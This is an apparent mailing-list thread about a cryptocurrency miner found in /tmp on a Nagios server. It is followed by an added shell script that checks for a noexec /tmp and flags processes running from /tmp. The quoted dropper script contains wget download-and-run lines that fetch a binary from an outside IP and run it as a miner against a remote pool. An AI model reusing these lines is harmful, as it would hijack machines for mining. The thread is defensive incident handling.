Probably also worth making /tmp noexec so that stuff like this has a
harder time getting started.

On 20 April 2014 20:14, Gary Steers <[email protected]> wrote:
> All,
>
> This looks like it's some form of cryptocurrency miner, "xptMiner.exe"; think
> that one's a RieCoin one...
>
> Undoubtedly the servers in use are compromised in some way, but it may be worth
> an abuse message to the contact on the RIR record in whois?
>
> Gavin, I've sent you an off-topic e-mail as well with a little more info;
> hope it was useful.
>
> ---
> Gary Steers
> Chief Network Engineer | Boosty
>
>
> On 20 April 2014 19:56, Gavin Henry <[email protected]> wrote:
>>
>> Hi all,
>>
>> Not usually a post you see on uknof, but wanted some help and to check
>> if anyone else has seen this?
>>
>> We've just started getting alerts from one of our servers for high load
>> and discovered a weird process:
>>
>> nagios    285936  0.0  0.0  10744  1468 ?        S    19:03   0:00 bash /tmp/toplel
>> nagios    292199  102  0.5 3261868 362816 ?      Rl   19:39   0:15  \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752
>>
>>
>> root@hostname:/tmp# ls -lh
>> total 1016K
>> -rw-r--r-- 1 nagios nagios     0 Apr 20 18:26 lllll
>> -rwxrwxrwx 1 nagios nagios   615 Apr 20 19:05 toplel
>> -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t
>>
>>
>> No idea where it came from. All our stuff has OpenSSL updated, as is
>> our Nagios. w00t is a binary; toplel is a bash script containing:
>>
>> #!/bin/bash
>> if [ $1 -le 10 ] ; then
>>         NUM = $(expr $1 + 1)
>>         nohup bash $0 $NUM >/dev/null 2>&1 &
>>         exit
>> fi
>> CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
>> FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
>> FREE=$(expr $FREE - 52428800)
>> FREE=$(expr $FREE / $CORECOUNT)
>>
>> while true; do
>>         killall w00t
>>         wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
>>         chmod 777 /tmp/w00t
>>         /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
>>
>>         wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
>>         chmod 777 /tmp/w00t
>>         /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
>>
>>         sleep 300
>> done;
>>
>>
>>
>> --
>> Kind Regards,
>> Gavin Henry.
>>
>
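Added example (mine, not code from anyone on the thread): a small POSIX sh script that checks whether /tmp is mounted noexec and flags processes whose arguments point under /tmp, run over constructed sample data (a /proc/mounts excerpt and ps lines modelled on the ones Gavin posted) so it works offline. The one caveat worth spelling out: noexec stops the kernel from exec'ing /tmp/w00t directly, but "bash /tmp/toplel" still runs, because the interpreter being executed is /bin/bash and the script is only read as data. That is why the process check looks at every argument, not just the first one.

```shell
#!/bin/sh
# Added example, not from the thread. Hardening reference (what "/tmp noexec"
# means in /etc/fstab and as a live remount):
#   tmpfs /tmp tmpfs defaults,nosuid,nodev,noexec 0 0
#   mount -o remount,nosuid,nodev,noexec /tmp

# Constructed /proc/mounts excerpts: one without noexec, one with it.
SAMPLE_MOUNTS_WEAK='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0'
SAMPLE_MOUNTS_HARD='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0'

# Constructed "ps aux" output; the two nagios lines mirror Gavin's post.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 10000 1000 ? Ss 18:00 0:01 /sbin/init
nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel
nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752
nagios 300 0.0 0.0 5000 500 ? S 19:40 0:00 /usr/lib/nagios/plugins/check_load'

# tmp_is_noexec MOUNTS_TEXT
# Returns 0 if the mount entry for /tmp carries the noexec option, 1 otherwise
# (including when /tmp is not a separate mount at all).
tmp_is_noexec() {
    printf '%s\n' "$1" | (
        while read -r dev mnt fstype opts rest; do
            [ "$mnt" = "/tmp" ] || continue
            case ",$opts," in *,noexec,*) exit 0 ;; esac
        done
        exit 1
    )
}

# flag_tmp_procs PS_TEXT
# Prints "PID<TAB>COMMAND" for every process that has any argument under /tmp/.
# Checking all arguments (not just argv[0]) catches "bash /tmp/toplel", which a
# noexec mount does not stop, as well as the bare /tmp/w00t binary.
flag_tmp_procs() {
    printf '%s\n' "$1" | awk 'NR > 1 {
        for (i = 11; i <= NF; i++) {
            if ($i ~ /^\/tmp\//) {
                cmd = ""
                for (j = 11; j <= NF; j++) cmd = cmd (j > 11 ? " " : "") $j
                print $2 "\t" cmd
                break
            }
        }
    }'
}

# When run directly, look at the live system if it exposes the data.
if [ -r /proc/mounts ]; then
    if tmp_is_noexec "$(cat /proc/mounts)"; then
        echo "/tmp is mounted noexec"
    else
        echo "/tmp is NOT noexec (or is not a separate mount)"
    fi
fi
if ps_out=$(ps aux 2>/dev/null); then
    flag_tmp_procs "$ps_out"
fi
```

Run it as-is and it reports on the host it is on; the two functions are the reusable parts (an NRPE-style check can call flag_tmp_procs and alert on any output). Treat noexec as one layer only: it does not stop the dropper from running under bash, and it does not stop wget writing into /tmp, so the process check is the part that would have caught this earlier.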